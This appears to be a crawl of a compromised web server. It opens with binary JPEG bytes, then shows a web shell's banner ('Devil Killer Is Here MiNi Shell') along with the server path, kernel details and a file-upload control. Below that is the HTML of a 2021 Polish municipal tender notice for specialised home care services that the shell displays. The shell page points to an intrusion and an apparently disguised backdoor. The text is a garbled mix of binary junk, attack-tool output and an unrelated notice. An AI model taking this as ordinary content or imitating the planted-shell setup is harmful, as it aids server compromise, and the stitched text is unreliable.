JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211029/0025214801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych dla osób wymagających pomocy w Gminie Dąbrowa Górnicza”<br/>NR - ZP/2 /48U/MOPS/2021 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ W DĄBROWIE GÓRNICZEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003481572</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Józefa Piłsudskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dąbrowa Górnicza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mops.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mops.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych dla osób wymagających pomocy w Gminie Dąbrowa Górnicza”<br/>NR - ZP/2 /48U/MOPS/2021 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-01b1f755-38b1-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00252148</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000601/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych dla osób wymagających pomocy w Gminie Dąbrowa Górnicza</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mops-dg.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mops-dg.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://mops-dg.logintrade.net/rejestracja/instrukcje.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje usługi dostosowane do szczególnych potrzeb życiowych osób, wynikających z rodzaju ich schorzenia lub niepełnosprawności, świadczone przez osoby ze specjalistycznym przygotowaniem zawodowym. Ww. usługi są świadczone zgodnie z art.17 ust. 1 pkt 11, art. 50, art. 50a ustawy z dnia 12 marca 2004 r. o pomocy społecznej oraz Rozporządzeniem Ministra Polityki Społecznej z dnia 22.09.2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. z 2005 r. Nr 189 poz. 1598 ze zmianą z dnia 6 lipiec 2006 r., Nr 134, poz. 943).3.1). Zamawiający informacyjnie podaje, iż w roku 2021 najmniej w miesiącu zrealizowano<br/>566 godzin usług, natomiast średnio w skali miesiąca było realizowane 606 godzin usług.<br/>3.2).Faktyczna ilość godzin świadczonych usług w danym miesiącu będzie uzależniona od wysokości posiadanych środków w roku budżetowym, od ofertowej ceny jednostkowej za 1 godz. świadczenia usług oraz od potrzeb wynikających ze zmiennej ilości osób kwalifikujących się do korzystania z usług.<br/>3.3). Zamówienie będzie realizowane po cenie jednostkowej za 1 godz. świadczenia usług do wysokości środków finansowych zabezpieczonych na ten cel w budżecie Zamawiającego.<br/>3.4 Zamawiający przewiduje możliwość zastosowania prawa opcji zgodnie z art 441 ust 1 uPzp.1. Szczegółowy opis przedmiotu zamówienia<br/>1.1 Do zadań Wykonawcy w zakresie specjalistycznych usług opiekuńczych w szczególności należy:<br/>1) Uczenie i rozwijanie umiejętności niezbędnych do samodzielnego życia, w tym zwłaszcza:<br/>a) kształtowanie umiejętności zaspokajania podstawowych potrzeb życiowych i umiejętności<br/> społecznego funkcjonowania, motywowanie do aktywności, leczenia i rehabilitacji, prowadzenie<br/> treningów umiejętności samoobsługi i umiejętności społecznych oraz wspieranie, także w formie <br/> asystowania w codziennych czynnościach życiowych takich, jak:<br/>- samoobsługa, zwłaszcza wykonywanie czynności gospodarczych i porządkowych, w tym<br/> umiejętność utrzymania i prowadzenia domu,<br/>- dbałość o higienę i wygląd,<br/>- utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu nauki i pracy oraz ze<br/> społecznością lokalną,<br/>- wspólne organizowanie i spędzanie czasu wolnego,<br/>- korzystanie z usług różnych instytucji,<br/>b) interwencje i pomoc w życiu w rodzinie, w tym:<br/>- pomoc w radzeniu sobie w sytuacjach kryzysowych – poradnictwo specjalistyczne, interwencje<br/> kryzysowe, wsparcie psychologiczne, rozmowy terapeutyczne,<br/>- ułatwienie dostępu do edukacji i kultury,<br/>- doradztwo, koordynacja działań innych służb na rzecz rodziny, której członkiem jest osoba<br/> uzyskująca pomoc w formie specjalistycznych usług,<br/>- kształtowanie pozytywnych relacji osoby wspieranej z osobami bliskimi,<br/>- współpraca z rodziną-kształtowanie odpowiednich postaw wobec osoby chorującej,<br/> niepełnosprawnej, <br/>c) pomoc w załatwianiu spraw urzędowych, w tym:<br/>- w uzyskiwaniu świadczeń socjalnych, emerytalno - rentowych,<br/>- w wypełnianiu dokumentów urzędowych,<br/>d) wspieranie i pomoc w uzyskaniu zatrudnienia, w tym zwłaszcza:<br/>- w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia albo alternatywnego zajęcia,<br/> w szczególności uczestnictwo w zajęciach warsztatów terapii zajęciowej, zakładach aktywności<br/> zawodowej, środowiskowych domach samopomocy, centrach i klubach integracji społecznej,<br/> klubach pracy,<br/>- w kompletowaniu dokumentów potrzebnych do zatrudnienia,<br/>- w przygotowaniu do rozmowy z pracodawcą, wspieranie i asystowanie w kontaktach z pracodawcą,<br/>- w rozwiązywaniu problemów psychicznych wynikających z pracy lub jej braku,<br/>e) pomoc w gospodarowaniu pieniędzmi, w tym:<br/>- nauka planowania budżetu, asystowanie przy ponoszeniu wydatków,<br/>- pomoc w uzyskaniu ulg w opłatach,<br/>- zwiększanie umiejętności gospodarowania własnym budżetem oraz usamodzielnienie finansowe.<br/><br/>2) Pielęgnacja - jako wspieranie procesu leczenia, w tym:<br/>a) pomoc w dostępie do świadczeń zdrowotnych,<br/>b) uzgadnianie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych,<br/>c) pomoc w wykupywaniu lub zamawianiu leków w aptece,<br/>d) pilnowanie przyjmowania leków oraz obserwowanie ewentualnych skutków ubocznych ich<br/> stosowania,<br/>e) w szczególnie uzasadnionych przypadkach zmiana opatrunków, pomoc w użyciu środków<br/> pomocniczych i materiałów medycznych, przedmiotów ortopedycznych, a także w utrzymaniu<br/> higieny, <br/>f) pomoc w dotarciu do placówek służby zdrowia,<br/>g) pomoc w dotarciu do placówek rehabilitacyjnych.<br/><br/>3) Rehabilitacja fizyczna i usprawnienie zaburzonych funkcji organizmu w zakresie nieobjętym przepisami ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych <br/>a) zgodnie z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej lub fizjoterapii,<br/>b) współpraca ze specjalistami w zakresie wspierania psychologiczno – pedagogicznego i edukacyjno–terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej ze specjalistycznych usług.<br/><br/>4) Pomoc mieszkaniowa, w tym:<br/>a) w uzyskaniu mieszkania, negocjowaniu i wnoszeniu opłat,<br/>b) w organizacji drobnych remontów, adaptacji, napraw, likwidacji barier architektonicznych,<br/>c) kształtowanie właściwych relacji osoby uzyskującej pomoc z sąsiadami i gospodarzem domu.<br/><br/>5) Rozliczenie środków finansowych klienta pozostających w dyspozycji osoby świadczącej usługi:<br/>a) Prowadzenie ewidencji wydatków i rozliczenia się z klientami z wydanych pieniędzy,<br/>b) Wnoszenie odpłatności od klienta na rzecz którego świadczone są specjalistyczne usługi opiekuńcze do kasy MOPS do 15- go dnia każdego miesiąca po wykonanej usłudze.<br/><br/>6) Wydatki związane z zakupami na rzecz klienta ponoszone są ze środków klienta. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85320000-8 - Usługi społeczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</p> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość zastosowania prawa opcji zgodnie z art 441 ust 1 uPzp.<br/>a) zakres podstawowy zamówienia obejmuje świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych do maksymalnej wartości określonej w umowie. <br/>b) część zamówienia, która będzie realizowana w ramach opcji obejmuje świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych do maksymalnej wartości umowy powiększonej o dodatkowe środki finansowe. Wartość dodatkowych środków finansowych nie przekroczy 30% wartości środków zakresu podstawowego, o których mowa w lit „a”) i projekcie umowy. <br/>3.5. Zamawiający skorzysta z prawa opcji w przypadku:<br/>- zaangażowania całości środków finansowych zabezpieczonych w budżecie na realizację<br/>zamówienia podstawowego, określonych w umowie i posiadania dodatkowych środków finansowych na świadczenie specjalistycznych usług opiekuńczych.<br/>3.6. Realizacja opcjonalnej części zamówienia będzie następować po złożeniu przez Zamawiającego<br/>oświadczenia woli drogą elektroniczną, w którym określi wartość dodatkowych środków na świadczenie specjalistycznych usług opiekuńczych.<br/>3.7. Realizacja opcjonalnej części zamówienia będzie odbywać się w oparciu o cenę jednostkową brutto za jedną godzinę świadczenia specjalistycznych usług opiekuńczych zadeklarowaną przez<br/>Wykonawcę w Druku oferty (zał. nr 2 do ogłoszenia).<br/>3.8. Zasady dotyczące realizacji przedmiotu zamówienia stanowiącego opcję są jednakowe, jak dla zamówienia podstawowego.<br/>3.9. Część przedmiotu zamówienia stanowiąca opcję będzie realizowana w ilościach zgodnych<br/>z potrzebami Zamawiającego.<br/>3.10. Zamawiający informuje, że realizacja części zamówienia objętego opcją jest wyłącznie uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W trakcie oceny ofert Zamawiający może żądać udzielania przez Wykonawców wyjaśnień dotyczących treści złożonej oferty.<br/>2. Zamawiający poprawi w ofertach omyłki zgodnie z art. 223 ust. 2 ustawy Pzp.<br/>3.Zamawiający odrzuci złożoną ofertę , w przypadku wystąpienia przynajmniej jednej okoliczności, o których mowa w art. 226 ust 1 ustawy Pzp.<br/>4. W przypadku, gdy nie zostanie złożona żadna oferta niepodlegająca odrzuceniu postępowanie zostanie unieważnione. Zamawiający unieważni postępowanie także w innych przypadkach, o których wskazuje ustawa.<br/>5. Zamawiający przyzna zamówienie Wykonawcy, który złoży ofertę niepodlegającą odrzuceniu, i która zostanie najwyżej oceniona (uzyska największą liczbę punktów przyznanych według kryteriów wyboru oferty określonych w niniejszej SWZ).<br/>2. Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium 100 pkt.<br/>3. Każde kryterium oceniane będzie wg punktacji w skali od 0 do 100 pkt pomnożone przez wagę.<br/>4. Najniższa oferowana cena brutto otrzyma maksymalną ilość punktów. Każda kolejna wyższa cena otrzyma ilość punktów wyliczoną wg proporcji matematycznej w stosunku do najniższej ceny ofertowej brutto. <br/>5. Punktacja za „Cena ofertowa brutto” będzie liczona matematycznie wg wzoru, gdzie: <br/>Pc – ilość punktów za kryterium cena <br/>CN – najniższa cena ofertowa brutto <br/>Cbo - cena ofertowa brutto<br/> CN najniższa cena ofertowa brutto <br/>Pc = --------------------------------------------------------- X 100 pkt <br/> CBo cena ofertowa brutto badanej oferty <br/>Uwagi:<br/>- Cena oferty uwzględnia założone przez Wykonawcę realne wskaźniki wzrostu cen i nie podlega zmianie <br/>w okresie jej obowiązywania.<br/>- Osoba składająca oświadczenie świadoma jest odpowiedzialności karnej wynikających z art. 297 Kodeksu <br/>Karnego<br/>6. Punktacja za „Czas reakcji objęcia klienta specjalistyczną usługą opiekuńczą od chwili zgłoszenia przez Zamawiającego w sytuacjach nagłych” będzie liczona jak niżej, gdzie:<br/>Pczr - ilość punktów za czas reakcji objęcia klienta specjalistyczną usługą opiekuńczą w sytuacjach nagłych<br/>- jeżeli klient zostanie objęty specjalistyczną usługą opiekuńczą w ciągu 11 - 12 godzin od chwili zgłoszenia przez Zamawiającego w sytuacjach nagłych – oferta otrzyma – 0 pkt <br/>- jeżeli klient zostanie objęty specjalistyczną usługą opiekuńczą w ciągu 9 - 10 godzin od chwili zgłoszenia przez Zamawiającego w sytuacjach nagłych – oferta otrzyma – 20 pkt <br/>- jeżeli klient zostanie objęty specjalistyczną usługą opiekuńczą w ciągu 5 - 8 godzin od chwili zgłoszenia przez Zamawiającego w sytuacjach nagłych – oferta otrzyma – 60 pkt<br/>- jeżeli klient zostanie objęty specjalistyczną usługą opiekuńczą do 4 godzin od chwili zgłoszenia przez Zamawiającego w sytuacjach nagłych – oferta otrzyma – 100 pkt <br/>Uwagi: - Przy określeniu czasu reakcji objęcia klienta usługą należy podać pełną godzinę, w przypadku zadeklarowania czasu reakcji<br/>w niepełnych godzinach, podany czas będzie zaokrąglany w górę do pełnych godzin.- Czas reakcji objęcia klienta usługą w sytuacjach nagłych nie może być dłuższy niż 12 godzin, w przypadku deklaracji dłuższego czasu reakcji oferta Wykonawcy będzie podlegała odrzuceniu.- Przez sytuacje nagłe Zamawiający rozumie np. nagłe pogorszenie stanu zdrowia, powrót klienta ze szpitala.<br/>- Godziny, o których mowa w ogłoszeniu są godzinami zegarowymi.<br/>7. Uzyskana liczba punktów w poszczególnych kryteriach zostanie przemnożona przez wagę %. Całkowita ilość punktów „P” stanowi sumę iloczynów punktów jakie oferta uzyskała w danym kryterium i wagi procentowej danego kryterium: P= (Pc x 60%) + ( Pczr x 40%)<br/>8. W przypadku kryterium &#34;Cena&#34; oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą z działania jw.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji objęcia klienta specjalistyczną usługą opiekuńczą od chwili zgłoszenia przez Zamawiającego w sytuacjach nagłych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.2 Na podstawie art.112 ust 2 ustawy Pzp , Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym - Zamawiający nie określa warunku udziału w postępowaniu w tym zakresie.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie określa warunku udziału w postępowaniu w tym zakresie.<br/><br/>3) sytuacji ekonomicznej lub finansowej -<br/>Zamawiający żąda dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia określonej w rozdz. X ust 2 pkt1 lit „a”. <br/> <br/>4) zdolności technicznej lub zawodowej-<br/>a) Zamawiający żąda wykazu usług wykonywanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi te zostały wykonane lub są wykonywane, oraz z załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz, którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie – powinny być wystawione w okresie ostatnich 3 miesięcy, określonej w rozdz. X ust. 2 pkt 2 lit „a” <br/><br/>b) Zamawiający żąda wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, lub kierowania robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie dysponowania tymi osobami określone w rozdz. X ust. 2 pkt 2 lit „b” <br/> <br/>Uwaga:<br/>Jeżeli Wykonawca z uzasadnionej przyczyny nie może złożyć wymaganego przez Zamawiającego podmiotowego środka dowodowego, Wykonawca składa inny podmiotowy środek dowodowy, który w wystarczający sposób potwierdzi spełnienie opisanego przez Zamawiającego warunku udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego jn. Za minimalny poziom zdolności uznane zostanie wykazanie przez Wykonawcę, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 50.000,00 zł 2. Wykaz głównych usług , jeżeli jest to uzasadnione charakterem, znaczeniem, przeznaczeniem lub zakresem usług, wykazu usług 